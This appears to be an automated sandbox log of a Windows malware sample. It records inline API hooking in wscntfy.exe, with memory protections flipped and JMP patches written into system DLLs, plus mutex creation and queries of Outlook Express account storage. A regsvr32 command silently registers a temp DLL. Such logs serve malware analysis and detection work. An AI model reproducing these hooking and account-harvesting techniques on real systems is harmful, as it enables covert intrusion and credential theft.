Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2645839258
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2645839663
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2645840067
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2645840468
Memory allocated PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0000 Length: C1F4C0 Allocation Type: null Protection: page execute and read and write success or wait 2645840989
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2645842304
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2645842606
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 C6 7B success or wait 2645843962
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D1AE Length: 5 Value: E9 A4 AE 1E 84 success or wait 2645844663
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2645844883
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2645846148
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2645846672
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 C7 7B success or wait 2645847328
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C91632D Length: 5 Value: E9 09 1F 1E 84 success or wait 2645847947
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C91632D Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2645848164
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 77212EBC Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2645848803
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 77212EBC Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 2645849051
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0014 Length: 10 Value: 8B FF 55 8B EC E9 A3 2E 57 76 success or wait 2645851257
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 77212EBC Length: 5 Value: E9 FD 4B 8D 89 success or wait 2645851891
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 77212EBC Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2645852113
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C60A1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2645853040
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C60A1 Length: 30 Value: 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 2645853287
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA001E Length: 10 Value: 8B FF 55 8B EC E9 7E 60 52 76 success or wait 2645853991
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C60A1 Length: 5 Value: E9 6F 1A 92 89 success or wait 2645854624
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C60A1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2645854846
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771CE9C1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2645855709
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771CE9C1 Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 2645855953
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0028 Length: 10 Value: 8B FF 55 8B EC E9 94 E9 52 76 success or wait 2645856649
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771CE9C1 Length: 5 Value: E9 A6 91 91 89 success or wait 2645857281
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771CE9C1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2645857502
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 77212FC1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2645857956
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 77212FC1 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 2645858162
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0032 Length: 10 Value: 8B FF 55 8B EC E9 8A 2F 57 76 success or wait 2645858884
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 77212FC1 Length: 5 Value: E9 4B 4C 8D 89 success or wait 2645859511
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 77212FC1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2645859696
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C4D8C Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2645860609
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C4D8C Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 2645860854
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA003C Length: 10 Value: 8B FF 55 8B EC E9 4B 4D 52 76 success or wait 2645861546
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C4D8C Length: 5 Value: E9 25 2F 92 89 success or wait 2645862173
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C4D8C Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2645862392
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C82EA Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2645863284
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C82EA Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 2645863526
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0046 Length: 10 Value: 8B FF 55 8B EC E9 9F 82 52 76 success or wait 2645864216
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C82EA Length: 5 Value: E9 0A FA 91 89 success or wait 2645864841
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C82EA Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2645865059
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771F9100 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2645865667
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771F9100 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 2645865908
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0050 Length: 10 Value: 8B FF 55 8B EC E9 AB 90 55 76 success or wait 2645866598
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771F9100 Length: 5 Value: E9 34 EC 8E 89 success or wait 2645867221
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771F9100 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2645867439
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771D89F7 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2645868240
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771D89F7 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 2645868480
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA005A Length: 10 Value: 8B FF 55 8B EC E9 98 89 53 76 success or wait 2645869167
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771D89F7 Length: 5 Value: E9 8B F3 90 89 success or wait 2645869788
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771D89F7 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2645870005
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C79C2 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2645870883
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C79C2 Length: 30 Value: 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 2645871294
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0064 Length: 12 Value: 6A 2C 68 10 7B 1C 77 E9 59 79 52 76 success or wait 2645871999
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C79C2 Length: 5 Value: E9 F0 03 92 89 success or wait 2645872631
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771C79C2 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2645872853
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771F9C53 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2645873457
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771F9C53 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2645873662
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0070 Length: 10 Value: 8B FF 55 8B EC E9 DE 9B 55 76 success or wait 2645874327
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771F9C53 Length: 5 Value: E9 B4 E1 8E 89 success or wait 2645874959
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771F9C53 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2645875144
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771D9064 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2645875942
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771D9064 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2645876186
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA007A Length: 10 Value: 8B FF 55 8B EC E9 E5 8F 53 76 success or wait 2645876882
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771D9064 Length: 5 Value: E9 BB ED 90 89 success or wait 2645877513
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771D9064 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2645877733
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771BB1D8 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2645878668
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771BB1D8 Length: 30 Value: 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 2645878911
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA0084 Length: 10 Value: 8B FF 55 8B EC E9 4F B1 51 76 success or wait 2645879605
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771BB1D8 Length: 5 Value: E9 5F CC 92 89 success or wait 2645880300
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 771BB1D8 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2645880525
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB3E2B Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2645880827
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 2645881072
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: CA008E Length: 10 Value: 8B FF 55 8B EC E9 98 3D E1 70 success or wait 2645881767
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB3E2B Length: 5 Value: E9 3E E9 03 8F success or wait 2645882668
Memory attributes changed PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB3E2B Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2645882887
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 2645883421
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 2645885477
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB676F Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 2645887454
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB4CB5 Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 2645889444
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 2645892797
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 2645896035
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2645900920
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2645903943
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2645907050
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2645911282
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 2645914232
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 2645916879
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 2645920126
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 2645922554
Memory read PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 2645925438
System info queried Type: ProcessInformation success or wait 2646006217
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: CB0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2646010850
Thread created PID: 1860 TID: 1748 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wscntfy.exe Injected: false success or wait 2646105113
Mutant created Name: \BaseNamedObjects\Local\{FA8F3AD4-84A8-4B6A-FB56-FD56EA1DDE44} object name exists 2646106686
System info queried Type: ProcessInformation success or wait 2646107614
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: CB0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2646112287
Thread created PID: 1860 TID: 1636 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wscntfy.exe Injected: false success or wait 2646209537
Mutant created Name: \BaseNamedObjects\Local\{FA8F3AD5-84A9-4B6A-FB56-FD56EA1DDE44} object name exists 2646211076
System info queried Type: ProcessInformation success or wait 2646211750
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: CB0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2646216379
Thread created PID: 1860 TID: 1768 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wscntfy.exe Injected: false success or wait 2646315310
Mutant created Name: \BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} success or wait 2646316510
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 15807505 success or wait 2646316966
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 15807505 success or wait 2646317340
Section loaded Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: DA0000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 2646318868
Section loaded Path: \KnownDlls\CLBCATQ.DLL Access: write and read and execute Type: unknown Baseaddress: DA0000 Size: 401408 Protection: execute Mapped to pid: own pid object name not found 2646321619
Section loaded Path: C:\WINDOWS\system32\clbcatq.dll Access: query and write and read and execute Type: image Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid success or wait 2646322733
Section loaded Path: \KnownDlls\COMRes.dll Access: write and read and execute Type: unknown Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid object name not found 2658022136
Section loaded Path: C:\WINDOWS\system32\comres.dll Access: query and write and read and execute Type: image Baseaddress: 77050000 Size: 806912 Protection: read write Mapped to pid: own pid success or wait 2658025711
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2658461433
Section loaded Path: C:\WINDOWS\system32\msoeacct.dll Access: write and read and execute Type: commit Baseaddress: DA0000 Size: 253952 Protection: execute Mapped to pid: own pid success or wait 2659027911
Section loaded Path: C:\WINDOWS\system32\msoeacct.dll Access: write and read and execute Type: commit Baseaddress: DA0000 Size: 253952 Protection: execute Mapped to pid: own pid success or wait 2659051543
Section loaded Path: C:\WINDOWS\system32\msoeacct.dll Access: query and write and read and execute Type: image Baseaddress: 68810000 Size: 270336 Protection: read write Mapped to pid: own pid success or wait 2659084637
Section loaded Path: \KnownDlls\MSOERT2.dll Access: write and read and execute Type: unknown Baseaddress: 68810000 Size: 270336 Protection: read write Mapped to pid: own pid object name not found 2659116635
Section loaded Path: C:\WINDOWS\system32\msoert2.dll Access: query and write and read and execute Type: image Baseaddress: 76880000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 2659120842
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: DA0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2659416285
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: DA0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2659452798
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: DA0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2659462673
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: DC0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2660909875
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: DC0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2660914683
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: DC0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2660918265
Section loaded Path: C:\WINDOWS\system32\acctres.dll Access: write and read and execute Type: commit Baseaddress: DC0000 Size: 65536 Protection: execute Mapped to pid: own pid success or wait 2660979174
Section loaded Path: C:\WINDOWS\system32\acctres.dll Access: write and read and execute Type: commit Baseaddress: DC0000 Size: 65536 Protection: execute Mapped to pid: own pid success or wait 2661039119
Section loaded Path: C:\WINDOWS\system32\acctres.dll Access: query and write and read and execute Type: image Baseaddress: 71780000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2661043186
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Account Manager\Accounts Name: NULL success or wait 2661391707
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: write and read and execute Type: commit Baseaddress: DE0000 Size: 512000 Protection: execute Mapped to pid: own pid success or wait 2661404476
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: write and read and execute Type: commit Baseaddress: DE0000 Size: 512000 Protection: execute Mapped to pid: own pid success or wait 2661547374
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: query and write and read and execute Type: image Baseaddress: 470D0000 Size: 528384 Protection: read write Mapped to pid: own pid success or wait 2661549622
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: write and read and execute Type: commit Baseaddress: DE0000 Size: 249856 Protection: execute Mapped to pid: own pid success or wait 2661794539
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: write and read and execute Type: commit Baseaddress: DE0000 Size: 249856 Protection: execute Mapped to pid: own pid success or wait 2661819207
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: query and write and read and execute Type: image Baseaddress: 35F40000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 2661821763
Analysis File: regsvr32.exe PID: 1852 Parent PID: 1732
+ Sections
+ General
Start time: 05:44:49
Start date: 08/12/2011
Path: C:\WINDOWS\system32\regsvr32.exe
Commandline: regsvr32 -s C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpbt1.dll
Imagebase: 0x1000000
File size: 11776 bytes
MD5 hash: FBDB9D0935B9907B809B381FDDF1627F
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 1B0000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 1D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 220000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 270000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 774E0000 1302528 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 280000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown 6F880000 1875968 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown 77120000 569344 own pid read write object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 3D0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 1010000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 8B0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 380000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 380000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 380000 4096 own pid readonly success or wait 1
